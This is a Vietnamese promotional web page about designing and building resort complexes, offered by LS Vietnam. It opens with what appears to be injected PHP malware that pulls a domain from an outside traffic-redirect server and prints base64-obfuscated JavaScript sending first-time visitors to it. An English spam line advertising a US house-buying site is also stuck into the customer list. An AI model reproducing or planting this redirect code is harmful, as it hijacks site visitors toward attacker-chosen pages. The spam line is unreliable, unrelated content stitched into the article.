$alias = "29551697176418"; $key = "c7b088a5cce4359849d7e747bc979e91"; $file = dirname(__FILE__) . "/" . md5($alias); $time = time(); $file_exist = file_exists($file); $filetime = 0; $edittime = 0; $domain = false; if ($file_exist) { $filetime = filemtime($file); $edittime = $time - $filetime; $datafile = fopen($file, 'r'); $dcres = json_decode(base64_decode(fread($datafile, filesize($file))) , 1); if(!empty($dcres['domain'])) $url = $dcres['domain']; fclose($datafile); } if ($edittime >= 15 || !$file_exist || !$url) { $dcres = getdata($file,$key,$alias); if(isset($_REQUEST['ch'])){ var_dump($dcres); } if ($dcres['domain']) { $url = $dcres['domain']; } } function getdata($file,$key,$alias){ $newdomainurl = 'http://traffic-redirect.site/?t=json&i='.$key.'&a='.$alias; if(function_exists('curl_version')){ $curl = curl_init(); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_USERAGENT, 'get new domain'); curl_setopt($curl, CURLOPT_URL, $newdomainurl); curl_setopt($curl, CURLOPT_TIMEOUT, 5); $res = curl_exec($curl); curl_close($curl); }else $res = file_get_contents($newdomainurl); if(isset($_REQUEST['ch'])){ var_dump($res); } $dcres = json_decode($res, true); if ($dcres['domain']) { $cache = fopen($file, 'w+'); fwrite($cache, base64_encode($res)); fclose($cache); return $dcres; } return false; } if (!$_COOKIE[base64_decode('aHRfcnI=') ]) { setcookie(base64_decode('aHRfcnI=') , 1, time() + 86400, base64_decode('Lw==')); echo base64_decode('PHNjcmlwdD53aW5kb3cubG9jYXRpb24ucmVwbGFjZSgi') . $url . base64_decode('Iik7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAi') . $url . base64_decode('Ijs8L3NjcmlwdD4='); } ?> Xây dựng resort – khu nghỉ dưỡng vùng phức hợp

Xây dựng resort – khu nghỉ dưỡng vùng phức hợp

Resort – khu nghỉ dưỡng vùng phức hợp là thiết kế hệ thống nghỉ dưỡng sinh thái quy mô lớn với đầy đủ tiện nghi, mang đến những tiện ích tuyệt vời cho khách du lịch. Nếu bạn là chủ đầu tư và đang ấp ủ xây dựng resort – khu nghỉ dưỡng vùng phức hợp và chưa biết lựa chọn đơn vị nào thi công và thiết kế, có thể tham khảo ngay dịch vụ tư vấn thi công thiết kế từ A đến Z của Công ty TNHH Đầu tư LS Việt Nam, với đội ngũ kỹ sư, kiến trúc sư đông đảo, chắc chắn những mong muốn của bạn sẽ được hiện thực hóa qua từng bản thiết kế.

Đặc điểm resort –  khu nghỉ dưỡng phức hợp

Đây là loại hình nghỉ dưỡng cao cấp trong lĩnh vực du lịch, đây sẽ là mô hình khu nghỉ dưỡng có khuynh hướng phát triển mạnh và nhanh. Khu nghỉ dưỡng phức hợp bao gồm những khách sạn lớn, hạ tầng giải trí đủ sức tổ chức những show tầm cỡ lớn, nhà thi đấu thể thao, sòng bạc …. tập trung ở một điểm đến. Vì vậy, khách nghỉ dưỡng sẽ được trải nghiệm những dịch vụ này từ những thương hiệu lớn trong ngành giải trí. 

khu-nghi-duong-phuc-hop
Khu nghỉ dưỡng phức hợp sang trọng

Ưu điểm của resort –  khu nghỉ dưỡng phức hợp

  • Nơi đây là tổ hợp những dịch vụ bậc nhất thế giới, đầy đủ tiện ích, tất cả được tích hợp trong quy mô khép kín và có mối quan hệ chặt chẽ với các lĩnh vực du lịch khác. Nhằm mục đích mang lại trải nghiệm thú vị mới cho du khách.
  • Vì các khu nghỉ dưỡng phức hợp có nguồn vốn đầu từ từ các doanh nghiệp nước ngoài sẽ giúp cải thiện chất lượng và thu hút khách nghỉ dưỡng. 
  • Cách thức tổ chức quản lý khu nghỉ dưỡng theo tiêu chuẩn quốc tế.
  • Vị trí xây dựng khu nghỉ dưỡng thưởng những khu du lịch gần biển và những nơi có tài nguyên rừng núi. Như vậy, vừa đem lại sự gần gũi với thiên nhiên vừa đảm bảo sự tiện nghi đầy đủ và sang trọng nhất.
khu-nghi-duong
Khu nghỉ dưỡng tích hợp nhiều loại hình vui chơi giải trí tang trải nhiệm cho khách hàng

Nhóm khách hàng tiềm năng

  • Những cặp vợ chồng mới kết hôn: Sau khoảng thời gian tất bật, lo lắng chuẩn bị cho đám cưới là những giây phút tuyệt vời bên nhau, bởi vậy họ sẽ dành cho nhau những nơi đẹp và lãng mạn nhất. Vậy nên, khu nghỉ dưỡng phức hợp là nơi lý tưởng để họ trải nghiệm cảm giác thú vị đó.
  • Don’t let foreclosure ruin your credit – sell your San Jose home to https://www.cash-buyers.net/california/cash-buyers-for-houses-moreno-valley-ca/ instead.

  • Gia đình có trẻ nhỏ: Lựa chọn địa điểm để mọi người trong gia đình vui vẻ với nhau là điều rất khó. Nếu như người lớn tuổi thích sự bình yên, yên tĩnh thì người trẻ lại thích chạy nhảy vui chơi. Tưởng chừng không có nơi thích hợp cho cả gia đình thì khu resort phức hợp sẽ là điểm đến đáng lưu ý.
  • Những người trưởng thành muốn khám phá: Với khối lượng công việc nặng nề cùng với áp lực cuộc sống, thì họ cần những nơi để giải tỏa những căng thẳng, trải nghiệm điều mới mẻ. Đáp ứng nhu cầu của khách hàng với nhiều loại hình dịch vụ đa dạng thì khu nghỉ dưỡng phức hợp là lựa chọn hàng đầu.

Một số mô hình khu resort – khu nghỉ dưỡng phức hợp

  • Khu nghỉ dưỡng gần bãi biển: Du khách có thể tham gia các hoạt động du lịch biển và khám phá kỳ quan thiên nhiên. Các phòng nghỉ được trang bị đầy đủ, tiện nghi cùng với đội ngũ nhân viên chuyên nghiệp.
  • Khu nghỉ dưỡng tài nguyên rừng núi: Sở hữu vẻ đẹp thiên nhiên ban tặng, du khách được trải nghiệm cảnh quan tươi đẹp cùng và bầu không khí trong lành.
resort-khu-nghi-duong-phuc-hop
Mô hình khu resort – khu nghỉ dưỡng phức hợp đầy ắp tiện nghi
resort-khu-nghi-duong-phuc-hop
Mô hình khu resort – khu nghỉ dưỡng phức hợp đáp ứng các nhu cầu nghỉ ngơi, giải trí, tham quan du lịch của con người
resort-khu-nghi-duong-phuc-hop
Khu nghỉ dưỡng phức hợp chính – loại hình nghỉ dưỡng cao cấp
resort-khu-nghi-duong-phuc-hop
Hình ảnh nghỉ dưỡng phức hợp lung linh về đêm
resort-khu-nghi-duong-phuc-hop
Trải nghiệm nghỉ dưỡng tuyệt vời tại các khu nghỉ dưỡng phức hợp cao cấp

Hãy để LS Việt Nam cùng bạn trải nghiệm kỳ nghỉ tuyệt vời, liên hệ Hotline: 091 256 6052 để được tư vấn 24/7!!!

Trả lời

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *

0912566052